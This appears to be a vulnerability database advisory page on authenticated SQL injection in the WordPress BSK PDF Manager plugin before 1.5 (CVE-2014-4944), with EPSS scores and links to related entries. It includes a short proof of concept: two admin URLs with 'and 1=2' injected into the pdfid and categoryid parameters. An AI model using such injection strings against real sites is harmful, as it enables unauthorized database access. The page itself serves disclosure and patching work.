Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:D6998E1E-A75B-4A56-ABB6-C8E8C05D93CB
HistoryAug 01, 2014 - 12:00 a.m.

BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections

2014-08-0100:00:00
wpscan.com
7

0.001 Low

EPSS

Percentile

42.9%

JSON

The plugin did not use prepared statement with the categoryid and pdfid parameter when viewing the /wp-admin/admin.php?page=bsk-pdf-manager and /wp-admin/admin.php?page=bsk-pdf-manager-pdfs page leading to Authenticated SQL Injection issues

PoC

https://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&amp;view;=edit&amp;pdfid;=1 and 1=2 https://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&amp;view;=edit&amp;categoryid;=1 and 1=2

CPENameOperatorVersion
bsk-pdf-managerlt1.5

Related

patchstack 1
exploitdb 1
cvelist 1
wpexploit 1
cve 1
prion 1
nvd 1
patchstack
patchstack
WordPress BSK PDF Manager Plugin - Multiple SQL Injection Vulnerabilities
2014-07-09 00:00:00
exploitdb
exploitdb
WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities
2014-07-09 00:00:00
cvelist
cvelist
CVE-2014-4944
2022-10-03 16:20:46
wpexploit
wpexploit
BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections
2014-08-01 00:00:00
cve
cve
CVE-2014-4944
2022-10-03 16:20:46
prion
prion
Sql injection
2014-07-14 14:55:00
nvd
nvd
CVE-2014-4944
2014-07-14 14:55:07

0.001 Low

EPSS

Percentile

42.9%

JSON
Related for WPVDB-ID:D6998E1E-A75B-4A56-ABB6-C8E8C05D93CB
patchstack1exploitdb1cvelist1wpexploit1cve1prion1nvd1